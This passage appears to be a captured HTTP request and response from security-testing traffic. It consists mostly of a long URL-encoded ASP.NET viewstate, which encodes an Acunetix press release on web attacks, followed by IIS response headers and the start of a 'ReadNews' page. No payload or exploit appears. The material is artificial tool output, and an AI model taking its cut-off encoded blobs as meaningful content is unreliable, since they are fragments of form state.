SB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD